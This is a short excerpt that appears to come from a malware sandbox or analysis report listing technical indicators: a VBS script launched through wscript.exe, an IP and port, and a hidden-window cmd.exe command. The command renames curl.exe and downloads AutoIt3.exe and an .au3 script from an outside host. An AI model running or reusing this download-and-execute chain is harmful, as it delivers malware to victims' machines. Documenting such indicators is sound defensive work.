Technical Information
- '<SYSTEM32>\wscript.exe' "C:\jval\tudhai.vbs"
- C:\jval\tudhai.vbs
- '5.##8.87.58':2351
- http://5.###.87.58:2351/pfzubyro via 5.##8.87.58
- '<SYSTEM32>\cmd.exe' /c mkdir c:\pfzu & cd /d c:\pfzu & copy <SYSTEM32>\curl.exe pfzu.exe & pfzu -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & pfzu -o haclpi.au3 http://5.188.87.58:2351/msipfzubyr...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mkdir c:\pfzu & cd /d c:\pfzu & copy <SYSTEM32>\curl.exe pfzu.exe & pfzu -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & pfzu -o haclpi.au3 http://5.188.87.58:2351/msipfzubyr...